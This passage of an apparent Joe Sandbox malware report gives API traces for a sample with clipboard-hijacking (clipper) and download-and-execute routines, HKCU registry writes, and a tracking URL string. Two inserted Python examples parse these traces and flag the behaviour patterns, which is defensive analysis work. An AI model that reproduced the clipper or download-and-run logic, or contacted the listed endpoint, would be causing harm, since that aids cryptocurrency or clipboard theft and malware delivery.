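The listing above is the classic clipper shape: the routine sleeps, opens the clipboard, reads CF_TEXT (format 00000001), measures it, then empties the clipboard and writes its own buffer back before sleeping again. The function block that follows it on this page (0x4029f4) shows a second shape, fetch a URL into a GetTempFileNameW path and hand it to ShellExecuteExW. As an added example, not part of the Joe Sandbox report, here is a Python parser for the report's per-function "APIs" lines plus an ordered-subsequence matcher that flags both shapes and decodes the CreateFileW access/disposition words. The two sample inputs are copied from this page's listings; the pattern names, the GENERIC_*/CREATE_* decoding tables and every helper name are my own assumptions, not Joe Sandbox conventions.

```python
"""Added example: parse Joe Sandbox per-function "APIs" listings and flag
behaviour sequences. Sample inputs are copied from this report page; the
pattern names and helpers are the author's own, not Joe Sandbox's."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Sequence, Tuple

# One listing line, e.g. "• OpenClipboard.USER32(00000000), ref: 0040171D";
# calls made inside a callee are prefixed "Part of subcall function XXXX:".
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<sub>Part of subcall function\s+[0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][\w$@?]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: Tuple[str, ...]   # hex words as printed; "?" where the sandbox could not resolve
    ref: int                # call-site address
    subcall: bool           # attributed to a callee rather than this function


def parse_api_listing(text: str) -> List[Call]:
    """Turn a listing into Call records; headings and blank lines are skipped."""
    calls: List[Call] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in (m.group("args") or "").split(",") if a.strip())
        calls.append(Call(m.group("api"), m.group("module"), args,
                          int(m.group("ref"), 16), m.group("sub") is not None))
    return calls


# Ordered (not necessarily adjacent) API subsequences that characterise a behaviour.
PATTERNS: Dict[str, Tuple[str, ...]] = {
    # read the clipboard and overwrite it in the same routine: clipper behaviour
    "clipboard_replace": ("OpenClipboard", "GetClipboardData", "EmptyClipboard",
                          "SetClipboardData", "CloseClipboard"),
    # fetch a URL, spool it to a temp file, launch it
    "drop_and_execute": ("InternetOpenUrlW", "GetTempFileNameW", "CreateFileW",
                         "InternetReadFile", "WriteFile", "ShellExecuteExW"),
}


def match_sequence(calls: Sequence[Call], pattern: Sequence[str]) -> Optional[List[Call]]:
    """Greedy in-order match of pattern against the function's own (non-subcall) calls."""
    hits: List[Call] = []
    for call in calls:
        if call.subcall:
            continue
        if call.api == pattern[len(hits)]:
            hits.append(call)
            if len(hits) == len(pattern):
                return hits
    return None


def classify(calls: Sequence[Call]) -> List[str]:
    return [name for name, pat in PATTERNS.items() if match_sequence(calls, pat)]


def sleep_delays_ms(calls: Sequence[Call]) -> List[int]:
    """Sleep() intervals in the routine; one before and one after the body means a polling loop."""
    return [int(c.args[0], 16) for c in calls
            if c.api == "Sleep" and not c.subcall and c.args and c.args[0] != "?"]


GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def describe_createfile(call: Call) -> str:
    """Decode dwDesiredAccess (2nd arg) and dwCreationDisposition (5th arg) of CreateFileW."""
    if call.api != "CreateFileW" or len(call.args) < 5:
        return "?"
    try:
        access, disp = int(call.args[1], 16), int(call.args[4], 16)
    except ValueError:          # sandbox printed "?" for an unresolved argument
        return "?"
    names = "|".join(n for bit, n in GENERIC.items() if access & bit) or hex(access)
    return f"access={names} disposition={DISPOSITION.get(disp, hex(disp))}"


# Constructed test input: the two listings from this report page.
SAMPLE_CLIPBOARD = """APIs
• __EH_prolog3_GS.LIBCMT ref: 004016E6
• Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
  • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
• OpenClipboard.USER32(00000000), ref: 0040171D
• GetClipboardData.USER32(00000001), ref: 0040172D
• GlobalLock.KERNEL32(00000000), ref: 0040173C
• _strlen.LIBCMT ref: 00401749
• _strlen.LIBCMT ref: 00401778
• _strlen.LIBCMT ref: 004018BC
• EmptyClipboard.USER32 ref: 004018D2
• GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
• GlobalLock.KERNEL32(00000000), ref: 004018FD
• GlobalUnlock.KERNEL32(00000000), ref: 00401909
• SetClipboardData.USER32(00000001,00000000), ref: 00401912
• GlobalFree.KERNEL32(00000000), ref: 00401919
• CloseClipboard.USER32 ref: 0040193D
• Sleep.KERNEL32(000002D2), ref: 00401948
"""
SAMPLE_DOWNLOAD = """APIs
• InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
• InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
• GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
• GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
• InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
• CloseHandle.KERNEL32(00000000), ref: 00402B07
• ShellExecuteExW.SHELL32(?), ref: 00402B68
• WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
"""

if __name__ == "__main__":
    for label, text in (("0x4016df", SAMPLE_CLIPBOARD), ("0x4029f4", SAMPLE_DOWNLOAD)):
        calls = parse_api_listing(text)
        print(label, classify(calls), "sleep_ms=", sleep_delays_ms(calls))
        for c in calls:
            if c.api == "CreateFileW":
                print("  CreateFileW@%08x" % c.ref, describe_createfile(c))
```

Subsequence rather than adjacency is deliberate: the sandbox interleaves CRT calls (`_strlen`, `GlobalLock`) between the clipboard APIs, and the matcher ignores "Part of subcall function" entries so that a `CreateFileW` inside a library wrapper does not complete a pattern that the function itself never performs.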

                                                                                                                                                                                                                                                                          Control-flow Graph

APIs
• InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
• InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
• GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
• GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
• InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
• CloseHandle.KERNEL32(00000000), ref: 00402B07
• ShellExecuteExW.SHELL32(?), ref: 00402B68
• WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
• CloseHandle.KERNEL32(?), ref: 00402B89
• InternetCloseHandle.WININET(00000000), ref: 00402B92
• InternetCloseHandle.WININET(00000000), ref: 00402B95
Strings
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
• String ID: .exe$<$ShareScreen
• API String ID: 3323492106-493228180
• Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
• Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
• Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
• Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A0A4B6
• Module32First.KERNEL32(00000000,00000224), ref: 00A0A4D6
Memory Dump Source
• Source File: 00000000.00000002.3744559508.0000000000A09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A09000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a09000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: b2f29f896515408588927e54fed472113860492bef12ca526b042dec7853e074
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: C9F096361007186BD7203BF9BC8DBAE76E8AF69724F100529F646914C0DBB5EC454A62

Control-flow Graph

APIs
  • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
• GetLastError.KERNEL32 ref: 0043D150
• __dosmaperr.LIBCMT ref: 0043D157
• GetFileType.KERNEL32(00000000), ref: 0043D163
• GetLastError.KERNEL32 ref: 0043D16D
• __dosmaperr.LIBCMT ref: 0043D176
• CloseHandle.KERNEL32(00000000), ref: 0043D196
• CloseHandle.KERNEL32(?), ref: 0043D2E0
• GetLastError.KERNEL32 ref: 0043D312
• __dosmaperr.LIBCMT ref: 0043D319
Strings
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
• Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
• Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
• Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
• Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
• Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
• Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0249024D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                          • Instruction ID: 399dcb6eb3918c0fda0455d7dbc85658349493339161d9849fa38a55beedf806
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2525874A01229DFDB64CF58C984BA9BBB1BF09314F1480DAE94DAB351DB30AE95CF14

Control-flow Graph

APIs
• InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
• InternetCloseHandle.WININET(00000000), ref: 00402E4B
• InternetCloseHandle.WININET(00000000), ref: 00402E4E
Strings
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: Internet$CloseHandleOpen_wcslen
• String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
• API String ID: 3067768807-1501832161
• Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
• Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
• Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
• Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
• String ID:
• API String ID: 1687354797-0
• Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
• Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
• Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
• Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Control-flow Graph

APIs
• std::_Cnd_initX.LIBCPMT ref: 0040581C
• __Cnd_signal.LIBCPMT ref: 00405828
• std::_Cnd_initX.LIBCPMT ref: 0040583D
• __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
• String ID:
• API String ID: 2059591211-0
• Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
• Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
• Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
• Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Control-flow Graph

APIs
• GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
• ExitThread.KERNEL32 ref: 0042DFDA
Strings
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: ErrorExitLastThread
• String ID: F(@
• API String ID: 1611280651-2698495834
• Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
• Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
• Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
• Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Control-flow Graph: basic blocks 42e114-42e197, calling CreateThread and GetLastError (graph edge data omitted)

APIs
• CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
• GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
• __dosmaperr.LIBCMT ref: 0042E170
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: CreateErrorLastThread__dosmaperr
• String ID:
• API String ID: 2744730728-0
• Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
• Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
• Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
• Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Control-flow Graph
  • control_flow_graph 456 434755-43476d call 439921 459 434780-434796 SetFilePointerEx 456->459 460 43476f-434774 call 42eac9 456->460 462 4347a7-4347b1 459->462 463 434798-4347a5 GetLastError call 42ea93 459->463 467 43477a-43477e 460->467 466 4347b3-4347c8 462->466 462->467 463->467 468 4347cd-4347d2 466->468 467->468
APIs
  • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
  • GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
  • __dosmaperr.LIBCMT ref: 0043479F
Memory Dump Source
  • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
  • API ID: ErrorFileLastPointer__dosmaperr
  • String ID:
  • API String ID: 2336955059-0
  • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
  • Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
  • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
  • Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Control-flow Graph
  • control_flow_graph 470 402bad-402bd9 RegCreateKeyExW 471 402bdb-402bed RegSetValueExW 470->471 472 402bef-402bf2 470->472 471->472 473 402bf4-402bf7 RegCloseKey 472->473 474 402bfd-402c03 472->474 473->474
APIs
  • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
  • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
Memory Dump Source
  • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
  • API ID: CloseCreateValue
  • String ID:
  • API String ID: 1818849710-0
  • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
  • Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
  • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
  • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664
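The registry record above is easier to read once its hex arguments are mapped back to Win32 names: `80000001` is HKEY_CURRENT_USER, `000F003F` is KEY_ALL_ACCESS, and the `00000001` passed to RegSetValueExW is REG_SZ. The following Python is an added example, not part of the Joe Sandbox report or of Joe Sandbox's tooling: it parses lines in the report's `Api.MODULE(args), ref: addr` shape and decodes the registry and Sleep arguments. The sample lines are constructed copies of that shape; the parameter counts and constant tables are the documented Win32 values. A `?` in the report is treated as an unresolved argument.

```python
"""Decode Joe Sandbox 'APIs' trace lines into named Win32 constants.

Added example, not part of the Joe Sandbox report. SAMPLE_LINES are constructed
in the shape of the report's entries; the constant tables are documented Win32 values.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample lines in the shape of the report's "APIs" entries.
SAMPLE_LINES = [
    "RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF",
    "RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7",
    "RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7",
    "Sleep.KERNEL32(00001D1B), ref: 00401562",
]

LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Documented parameter counts. The report prints whatever was on the stack at the
# call site, so anything past these counts is caller context, not a real argument.
PARAM_COUNT = {"RegCreateKeyExW": 9, "RegSetValueExW": 6, "RegCloseKey": 1, "Sleep": 1}

HKEY_NAMES = {
    0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
}
REG_TYPES = {0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY",
             4: "REG_DWORD", 7: "REG_MULTI_SZ", 11: "REG_QWORD"}
KEY_RIGHTS = {
    0x0001: "KEY_QUERY_VALUE", 0x0002: "KEY_SET_VALUE", 0x0004: "KEY_CREATE_SUB_KEY",
    0x0008: "KEY_ENUMERATE_SUB_KEYS", 0x0010: "KEY_NOTIFY", 0x0020: "KEY_CREATE_LINK",
    0x00010000: "DELETE", 0x00020000: "READ_CONTROL", 0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
}
KEY_ALL_ACCESS = 0x000F003F


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report printed '?'
    ref: int                    # address of the call instruction


def parse_api_line(line: str) -> ApiCall:
    """Parse one 'Api.MODULE(a,b,...), ref: ADDR' line, trimming extra stack slots."""
    m = LINE_RE.match(line.strip().lstrip("• ").strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    raw = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    args = [None if a == "?" else int(a, 16) for a in raw]
    count = PARAM_COUNT.get(m["api"])
    if count is not None:
        args = args[:count]   # drop stack slots that are not parameters
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16))


def decode_access_mask(mask: Optional[int]) -> str:
    """Render a registry samDesired mask as KEY_* / standard-rights names."""
    if mask is None:
        return "?"
    if mask == KEY_ALL_ACCESS:
        return "KEY_ALL_ACCESS"
    names = [name for bit, name in KEY_RIGHTS.items() if mask & bit]
    leftover = mask & ~sum(KEY_RIGHTS)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) if names else hex(mask)


def _name(table: Dict[int, str], value: Optional[int]) -> str:
    return "?" if value is None else table.get(value, hex(value))


def describe(call: ApiCall) -> Dict[str, object]:
    """Name the security-relevant arguments of the calls this example knows."""
    a = call.args
    if call.api == "RegCreateKeyExW":
        return {"hKey": _name(HKEY_NAMES, a[0]), "samDesired": decode_access_mask(a[5])}
    if call.api == "RegSetValueExW":
        # cbData is a byte count; for REG_SZ it includes the UTF-16 terminator.
        return {"dwType": _name(REG_TYPES, a[3]), "cbData": a[5]}
    if call.api == "Sleep":
        return {"milliseconds": a[0]}
    return {}


def summarize(lines: List[str]) -> List[Dict[str, object]]:
    out = []
    for line in lines:
        call = parse_api_line(line)
        out.append({"api": call.api, "ref": f"{call.ref:08X}", **describe(call)})
    return out


if __name__ == "__main__":
    for entry in summarize(SAMPLE_LINES):
        print(entry)
```

Decoded, the record reads as RegCreateKeyExW(HKEY_CURRENT_USER, ?, ..., KEY_ALL_ACCESS) followed by RegSetValueExW(?, ?, 0, REG_SZ, ?, 4): a four-byte string value written under the current user's hive, with the key path and value name left unresolved by the report. Two caveats when reading these entries: the report dumps stack slots past the real parameter list (RegSetValueExW shows fourteen values for a six-parameter API), and the module suffix reflects where the hook resolved the call rather than the documented export (the Reg* functions are documented in ADVAPI32), so key any detection logic on the API name, not on KERNEL32 versus ADVAPI32.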

Control-flow Graph
  • control_flow_graph 475 42e074-42e081 call 431f5e 478 42e083-42e086 ExitThread 475->478 479 42e08c-42e094 475->479 479->478 480 42e096-42e09a 479->480 481 42e0a1-42e0a7 480->481 482 42e09c call 4354f6 480->482 484 42e0b4-42e0ba 481->484 485 42e0a9-42e0ab 481->485 482->481 484->478 486 42e0bc-42e0be 484->486 485->484 487 42e0ad-42e0ae CloseHandle 485->487 486->478 488 42e0c0-42e0ca FreeLibraryAndExitThread 486->488 487->484
APIs
    • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
    • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
    • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
  • ExitThread.KERNEL32 ref: 0042E086
  • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
  • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
Memory Dump Source
  • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
  • String ID:
  • API String ID: 1198197534-0
  • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
  • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
  • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
  • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

Control-flow Graph
  • control_flow_graph 489 40239e-4023ac 490 402561-402563 PostQuitMessage 489->490 491 4023b2-4023b7 489->491 492 402569-40256e 490->492 493 4023d0-4023d7 491->493 494 4023b9-4023cb DefWindowProcW 491->494 495 4023d9 call 401da4 493->495 496 4023de-4023e5 493->496 494->492 495->496 496->492 498 4023eb-40255f call 4010ba call 4029f4 496->498 498->492
APIs
  • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
  • PostQuitMessage.USER32(00000000), ref: 00402563
Memory Dump Source
  • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
  • API ID: MessagePostProcQuitWindow
  • String ID:
  • API String ID: 3873111417-0
  • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
  • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
  • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
  • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

Control-flow Graph
  • control_flow_graph 503 40155a-4016d0 Sleep call 4010ba 505 4016d5-4016d9 503->505
APIs
  • Sleep.KERNEL32(00001D1B), ref: 00401562
    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
Strings
Memory Dump Source
  • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
